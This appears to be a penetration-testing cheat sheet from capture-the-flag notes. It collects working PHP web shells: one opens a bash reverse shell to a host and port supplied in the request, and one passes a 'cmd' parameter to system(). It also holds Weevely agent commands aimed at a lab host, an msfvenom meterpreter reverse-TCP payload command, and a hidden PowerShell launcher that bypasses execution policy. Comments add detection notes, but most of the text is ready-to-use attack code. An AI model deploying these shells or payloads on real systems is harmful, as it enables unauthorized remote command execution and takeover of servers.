PHP


<?php

// Unauthenticated web shell: both branches hand request parameters straight to
// the operating system, so anyone who can reach this file can run commands with
// the privileges of the PHP process.
// Parameters are read from $_REQUEST, so they may arrive in the query string or
// in a POST body (and, depending on request_order, a cookie); URL-only access
// logs will not show the POST/cookie cases.
// Defender notes: look for the web-server/PHP process spawning /bin/bash, for
// outbound TCP connections initiated by the web server, and for requests that
// carry `ip`, `port` or `cmd` parameters. Listing exec/system in
// disable_functions and preventing script execution in upload directories stops
// this file from working.

 // Callback port taken from the request; falls back to the string '1234'.
 $port = (isset($_REQUEST['port'])) ? $_REQUEST['port'] : '1234' ; 

 if(isset($_REQUEST['ip'])) {
   // Reverse shell: starts an interactive bash whose stdout/stderr (>&) and
   // stdin (0>&1) are redirected to a TCP connection to ip:port through bash's
   // /dev/tcp pseudo-path. Both values are concatenated into the command line
   // without validation or escaping.
   exec("/bin/bash -c 'bash -i >& /dev/tcp/". $_REQUEST['ip'] ."/". $port . " 0>&1'");
 } elseif(isset($_REQUEST['cmd'])) {
   // One-shot command execution: exec() returns only the last line of the
   // command's output, and that line is echoed into the HTTP response.
   echo exec($_REQUEST['cmd']);
 }

?>
<?php
    // Minimal unauthenticated web shell: passes the `cmd` query-string parameter
    // to system() with no validation, running it with the privileges of the PHP
    // process. system() writes the command's output to the response itself and
    // returns the last line, so the echo repeats that last line.
    // Defender notes: because the value comes from $_GET, `cmd=` is visible in the
    // request URL and therefore in web access logs; the web-server process
    // spawning a shell is the matching host-side indicator.
    if(isset($_GET['cmd']))
    {
        echo system($_GET['cmd']);
    }
?>

Weevely

  1. Generate an agent
    /usr/share/weevely/weevely.py generate 123 reverse.php
    
  2. Upload the agent file to the server

  3. Connect to the agent
    /usr/share/weevely/weevely.py http://thetoppers.htb/reverse.php 123 
    

Msfvenom

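# Create a Metasploit payload (e.g. PHP).
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php

# Windows PowerShell launcher: hidden window, execution policy bypassed, no profile, and the script passed as a Base64 (UTF-16LE) -EncodedCommand. The value shown is a truncated sample (it decodes to only `$client `). These flags are visible on the process command line, so process-creation logging with command-line capture records them.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD==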